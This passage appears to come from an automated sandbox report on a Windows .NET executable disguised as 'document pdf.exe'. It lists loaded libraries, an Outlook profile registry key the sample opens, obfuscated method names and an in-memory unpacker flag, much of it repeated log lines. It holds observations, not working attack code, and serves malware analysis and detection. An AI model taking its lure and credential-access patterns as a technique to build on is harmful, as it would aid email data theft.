                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: document pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: document pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Accessibility.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Drawing.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb< source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.pdbMZ source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb4 source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: System.Core.ni.pdb source: WERA83F.tmp.dmp.6.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERA83F.tmp.dmp.6.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.cs.Net Code: wV1tBfkplX System.Reflection.Assembly.Load(byte[])
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.cs.Net Code: wV1tBfkplX System.Reflection.Assembly.Load(byte[])
                Source: document pdf.exeStatic PE information: section name: .text entropy: 7.85898553696103
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, cPI0l3jfbUJ3Gmg0V1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyhTJ1lLKy', 'x5AT5B97IC', 'keCTzfsSN5', 'WXymAWDY9N', 'PkbmIvFZKy', 'OY6mTlBx3f', 'Bw4mmCGV5P', 'cYbJv2Wq2XnbFuAeAsP'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, h8FvZ2KZgXqfHSw6TQ.csHigh entropy of concatenated method names: 'FsIxR710qp', 'pn3x87HW9h', 'ggxxB2OCGT', 'zZFxkCI25u', 'lVXxSXvMHC', 'Ga1xXinRau', 'Ga3x6Rttm6', 'zDVx0PfjJx', 'NEpxnyaPwt', 'tmYxh4ukcr'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, T6K8pjbZifSTbFSZ9B.csHigh entropy of concatenated method names: 'Ye8mdmUCgJ', 'LCcmZgwSZt', 'FtomClalTp', 'NTPmjqutTf', 'fsFmwRusX1', 'ew7m3AoDvM', 'eRCmx8rCy0', 'NFlmbqIPoA', 'QFZmOybNJk', 'f2amEjmy6S'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, SmJWIrImgluWmDxsAwH.csHigh entropy of concatenated method names: 'Wgdy5EpMP8', 'vjiyzy9ghm', 'ntofAX5dLC', 'hg625ADxsd6ES89QyE9', 'JLW1lRDsWv5pYcg7xJa', 'yZqHBiDywWMYBAxnfwa', 'OZb35JDRrWj5l0FCx9l', 'dwJBQ0DzFZPYJtTpAKG', 'WH5qs6q4CchxpWfXV5E'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, JZkhCDMk0cLgxHfPvG.csHigh entropy of concatenated method names: 'HFI3dMPkMj', 'wcN3CHKAUX', 'wbI3w4E7nb', 'yfv3xYQ0lW', 'f6t3b0OCG1', 'At9wVx4Ohq', 'JhKwsG4rqs', 'wslwgC3443', 'fImwUHAhrA', 'kAKwJGLxCF'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, FVXmryzaW31h7Zxmic.csHigh entropy of concatenated method names: 'UUBvXDAsOi', 'Wlov0JUa1d', 'v9LvntI2vk', 'icrvMQmVn5', 'd8dvoEfBLH', 'V2dvGLc2kK', 'JHvvLOMdrD', 'EsAvF7LspW', 'HwSvR3cDhh', 'QfCv8R7yvA'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, HIouCXJGgpPoraXn6K.csHigh entropy of concatenated method names: 'fBEcMAis3A', 'ntucohHH0k', 'RJocHbFF99', 'lOtcGBZ3Re', 'WWTcLYQQ2y', 'fJIc7qhwu8', 'f3ZcYG0Yny', 'XyIcierKU0', 'dgacK3EfSA', 'p7cc2UEouU'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, rjHBq35tdb8ThqfAYv.csHigh entropy of concatenated method names: 'soOvjlVFmt', 'sCwvwun86R', 'C8ov30N8KA', 'muRvxnIluq', 'nfFvc32TAv', 'DeCvbdg6t6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, ghvqCQsFvGSW9e4XwQ.csHigh entropy of concatenated method names: 'EP6WU4hn8w', 'sFgW5Db4B6', 'W7h4AQTERV', 'Cq24IMokbo', 'aDoWpgrd9Z', 'escWrFY2jQ', 'b0YWDtVojj', 'ufEWeBpZFj', 'kcXWaRmeXi', 'AkWWuqvAxJ'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, GrwPd6g9v5kPAC62D2.csHigh entropy of concatenated method names: 'VOMcPypK45', 'uXUcWa5mSN', 'unjcc9tDYp', 'uqZcy5UV0N', 'VTEcN1ytKh', 'FrMcFTZrNM', 'Dispose', 'xOu4ZYMyZj', 'ASo4CmS2xh', 'aTo4jQ0xrv'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, RHg6yTItPdmX4HuYj18.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1NfcdGIO4', 'nKYfvia2tY', 'SkdfySIGjy', 'ATuffNmshs', 'qjFfNf7ONJ', 'CkSfQErUWW', 'GipfF6D3eI'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, f3YHFNTeDelpv03gGw.csHigh entropy of concatenated method names: 'bpCBD3DT3', 'hWpkwkWEY', 'V8JXN56WX', 'RhM6yn1g2', 'U6Bni2YCm', 'sEKhexoUp', 'D7wSk0nGn9x18Pv5L4', 'L6vETZdm3eXtETCYLl', 'DXO4Dl4jO', 'riRvg4nYG'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, bYN99uYDD7Yh9wdRps.csHigh entropy of concatenated method names: 'IvvxZH8Ebk', 'FktxjKqHuC', 'GS9x34kJQk', 'eA235GXOXE', 'UOw3z2YtCO', 'wFyxAU5E9Q', 'TQbxIxkZai', 'bg2xTTTjta', 'dSZxmdMYCg', 'kq3xt2Q5YI'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, uUu7QSCXOUKTPo9h8I.csHigh entropy of concatenated method names: 'Dispose', 'YkPIJAC62D', 'e2uToLCPyc', 'sG2X79hhQq', 'NoII544rYJ', 'jRQIzD8BXF', 'ProcessDialogKey', 'I4oTAIouCX', 'JgpTIPoraX', 'E6KTT4jHBq'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, YuRtjF05Y3giqbqHZM.csHigh entropy of concatenated method names: 's0LCe2oJg5', 'oKnCaD8KSM', 'srACuukeLe', 'SMZCqJoKWZ', 'bOYCVYhFje', 'LpVCspNtl3', 'dVrCgaUAUY', 'VEUCUqMhrc', 'dcwCJWBcAo', 'sDuC5R5VoT'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, oe7jL6nP10c2udSebu.csHigh entropy of concatenated method names: 'ztsjktPiB4', 'agmjX2BlmL', 'eJWj02eWgD', 'dmjjnyw0At', 'AxbjPhmtG9', 'WugjlDovdQ', 'TrujWRSCUq', 'S9bj4ZbwiM', 'D1cjcTAnO7', 'ak1jvy09rh'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, RiGRWjIA3gRawRHkGiw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KY1vpYAYZV', 'pxYvrP3xU4', 'mWmvDLi5Ku', 'ixHveIaQhy', 'I63vaJc7X0', 'PLsvum0FBB', 'IWJvqw2CuQ'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, NQRJPkIIPvhJfnFMT9t.csHigh entropy of concatenated method names: 'f9Bv5tJ0AX', 'EJZvztt4eh', 'QgxyA8ycZP', 'nsryIiCoAO', 'plxyTPuxbb', 'vMSymLa63n', 'UrAytZ2Y0U', 'W26ydXK6nV', 'FqAyZP5jc8', 'r5iyCv5cK4'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, GoBOSfDFFSJvLMavk4.csHigh entropy of concatenated method names: 'HVZ10GPix7', 'Wu11nlouWK', 'hGn1M1VskF', 'dAw1oYZ3wK', 'DsN1GwUEiD', 'hMb1LEaHcP', 'R0F1YXMijq', 'iJK1ipxgTi', 'f9C12htffx', 'Gvm1ppdqLO'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, ifHd6Ot6S8hlB3LBGH.csHigh entropy of concatenated method names: 'ET5IxuRtjF', 'YY3Ibgiqbq', 'DP1IE0c2ud', 'BebI9u2D0Z', 'OYZIPiNLZk', 'FCDIlk0cLg', 'oSKU9VwwgMtPUTLERH', 'Ksd22qYtPY0xIpPesT', 'AcgIIvSLVj', 'NXlImlRaXd'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, bjc2kxqG0tHti4aXnv.csHigh entropy of concatenated method names: 'WpMWEg8hYk', 'DvWW9VSIjm', 'ToString', 'hvJWZ70BeO', 'tMwWCxmr78', 's4CWjKPMIK', 'na9Wwpmqsx', 'zdHW36FjYg', 'HAFWxZQjnK', 'A3iWbHgSFU'
                Source: 0.2.document pdf.exe.4475ea0.0.raw.unpack, VTaW7suKhQpQ6osLov.csHigh entropy of concatenated method names: 'ToString', 'Ji1lpyc2QJ', 'nFxloJh5Ym', 'FWglHPWI9i', 'EmblGASyMy', 'MF7lL5bJkG', 'hykl76g8we', 'NIYlYWZVmA', 'bIXliLgkBA', 'Fs6lKeIHyw'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, cPI0l3jfbUJ3Gmg0V1.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyhTJ1lLKy', 'x5AT5B97IC', 'keCTzfsSN5', 'WXymAWDY9N', 'PkbmIvFZKy', 'OY6mTlBx3f', 'Bw4mmCGV5P', 'cYbJv2Wq2XnbFuAeAsP'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, h8FvZ2KZgXqfHSw6TQ.csHigh entropy of concatenated method names: 'FsIxR710qp', 'pn3x87HW9h', 'ggxxB2OCGT', 'zZFxkCI25u', 'lVXxSXvMHC', 'Ga1xXinRau', 'Ga3x6Rttm6', 'zDVx0PfjJx', 'NEpxnyaPwt', 'tmYxh4ukcr'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, T6K8pjbZifSTbFSZ9B.csHigh entropy of concatenated method names: 'Ye8mdmUCgJ', 'LCcmZgwSZt', 'FtomClalTp', 'NTPmjqutTf', 'fsFmwRusX1', 'ew7m3AoDvM', 'eRCmx8rCy0', 'NFlmbqIPoA', 'QFZmOybNJk', 'f2amEjmy6S'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, SmJWIrImgluWmDxsAwH.csHigh entropy of concatenated method names: 'Wgdy5EpMP8', 'vjiyzy9ghm', 'ntofAX5dLC', 'hg625ADxsd6ES89QyE9', 'JLW1lRDsWv5pYcg7xJa', 'yZqHBiDywWMYBAxnfwa', 'OZb35JDRrWj5l0FCx9l', 'dwJBQ0DzFZPYJtTpAKG', 'WH5qs6q4CchxpWfXV5E'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, JZkhCDMk0cLgxHfPvG.csHigh entropy of concatenated method names: 'HFI3dMPkMj', 'wcN3CHKAUX', 'wbI3w4E7nb', 'yfv3xYQ0lW', 'f6t3b0OCG1', 'At9wVx4Ohq', 'JhKwsG4rqs', 'wslwgC3443', 'fImwUHAhrA', 'kAKwJGLxCF'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, FVXmryzaW31h7Zxmic.csHigh entropy of concatenated method names: 'UUBvXDAsOi', 'Wlov0JUa1d', 'v9LvntI2vk', 'icrvMQmVn5', 'd8dvoEfBLH', 'V2dvGLc2kK', 'JHvvLOMdrD', 'EsAvF7LspW', 'HwSvR3cDhh', 'QfCv8R7yvA'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, HIouCXJGgpPoraXn6K.csHigh entropy of concatenated method names: 'fBEcMAis3A', 'ntucohHH0k', 'RJocHbFF99', 'lOtcGBZ3Re', 'WWTcLYQQ2y', 'fJIc7qhwu8', 'f3ZcYG0Yny', 'XyIcierKU0', 'dgacK3EfSA', 'p7cc2UEouU'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, rjHBq35tdb8ThqfAYv.csHigh entropy of concatenated method names: 'soOvjlVFmt', 'sCwvwun86R', 'C8ov30N8KA', 'muRvxnIluq', 'nfFvc32TAv', 'DeCvbdg6t6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, ghvqCQsFvGSW9e4XwQ.csHigh entropy of concatenated method names: 'EP6WU4hn8w', 'sFgW5Db4B6', 'W7h4AQTERV', 'Cq24IMokbo', 'aDoWpgrd9Z', 'escWrFY2jQ', 'b0YWDtVojj', 'ufEWeBpZFj', 'kcXWaRmeXi', 'AkWWuqvAxJ'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, GrwPd6g9v5kPAC62D2.csHigh entropy of concatenated method names: 'VOMcPypK45', 'uXUcWa5mSN', 'unjcc9tDYp', 'uqZcy5UV0N', 'VTEcN1ytKh', 'FrMcFTZrNM', 'Dispose', 'xOu4ZYMyZj', 'ASo4CmS2xh', 'aTo4jQ0xrv'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, RHg6yTItPdmX4HuYj18.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1NfcdGIO4', 'nKYfvia2tY', 'SkdfySIGjy', 'ATuffNmshs', 'qjFfNf7ONJ', 'CkSfQErUWW', 'GipfF6D3eI'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, f3YHFNTeDelpv03gGw.csHigh entropy of concatenated method names: 'bpCBD3DT3', 'hWpkwkWEY', 'V8JXN56WX', 'RhM6yn1g2', 'U6Bni2YCm', 'sEKhexoUp', 'D7wSk0nGn9x18Pv5L4', 'L6vETZdm3eXtETCYLl', 'DXO4Dl4jO', 'riRvg4nYG'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, bYN99uYDD7Yh9wdRps.csHigh entropy of concatenated method names: 'IvvxZH8Ebk', 'FktxjKqHuC', 'GS9x34kJQk', 'eA235GXOXE', 'UOw3z2YtCO', 'wFyxAU5E9Q', 'TQbxIxkZai', 'bg2xTTTjta', 'dSZxmdMYCg', 'kq3xt2Q5YI'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, uUu7QSCXOUKTPo9h8I.csHigh entropy of concatenated method names: 'Dispose', 'YkPIJAC62D', 'e2uToLCPyc', 'sG2X79hhQq', 'NoII544rYJ', 'jRQIzD8BXF', 'ProcessDialogKey', 'I4oTAIouCX', 'JgpTIPoraX', 'E6KTT4jHBq'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, YuRtjF05Y3giqbqHZM.csHigh entropy of concatenated method names: 's0LCe2oJg5', 'oKnCaD8KSM', 'srACuukeLe', 'SMZCqJoKWZ', 'bOYCVYhFje', 'LpVCspNtl3', 'dVrCgaUAUY', 'VEUCUqMhrc', 'dcwCJWBcAo', 'sDuC5R5VoT'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, oe7jL6nP10c2udSebu.csHigh entropy of concatenated method names: 'ztsjktPiB4', 'agmjX2BlmL', 'eJWj02eWgD', 'dmjjnyw0At', 'AxbjPhmtG9', 'WugjlDovdQ', 'TrujWRSCUq', 'S9bj4ZbwiM', 'D1cjcTAnO7', 'ak1jvy09rh'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, RiGRWjIA3gRawRHkGiw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KY1vpYAYZV', 'pxYvrP3xU4', 'mWmvDLi5Ku', 'ixHveIaQhy', 'I63vaJc7X0', 'PLsvum0FBB', 'IWJvqw2CuQ'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, NQRJPkIIPvhJfnFMT9t.csHigh entropy of concatenated method names: 'f9Bv5tJ0AX', 'EJZvztt4eh', 'QgxyA8ycZP', 'nsryIiCoAO', 'plxyTPuxbb', 'vMSymLa63n', 'UrAytZ2Y0U', 'W26ydXK6nV', 'FqAyZP5jc8', 'r5iyCv5cK4'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, GoBOSfDFFSJvLMavk4.csHigh entropy of concatenated method names: 'HVZ10GPix7', 'Wu11nlouWK', 'hGn1M1VskF', 'dAw1oYZ3wK', 'DsN1GwUEiD', 'hMb1LEaHcP', 'R0F1YXMijq', 'iJK1ipxgTi', 'f9C12htffx', 'Gvm1ppdqLO'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, ifHd6Ot6S8hlB3LBGH.csHigh entropy of concatenated method names: 'ET5IxuRtjF', 'YY3Ibgiqbq', 'DP1IE0c2ud', 'BebI9u2D0Z', 'OYZIPiNLZk', 'FCDIlk0cLg', 'oSKU9VwwgMtPUTLERH', 'Ksd22qYtPY0xIpPesT', 'AcgIIvSLVj', 'NXlImlRaXd'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, bjc2kxqG0tHti4aXnv.csHigh entropy of concatenated method names: 'WpMWEg8hYk', 'DvWW9VSIjm', 'ToString', 'hvJWZ70BeO', 'tMwWCxmr78', 's4CWjKPMIK', 'na9Wwpmqsx', 'zdHW36FjYg', 'HAFWxZQjnK', 'A3iWbHgSFU'
                Source: 0.2.document pdf.exe.7a70000.4.raw.unpack, VTaW7suKhQpQ6osLov.csHigh entropy of concatenated method names: 'ToString', 'Ji1lpyc2QJ', 'nFxloJh5Ym', 'FWglHPWI9i', 'EmblGASyMy', 'MF7lL5bJkG', 'hykl76g8we', 'NIYlYWZVmA', 'bIXliLgkBA', 'Fs6lKeIHyw'
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
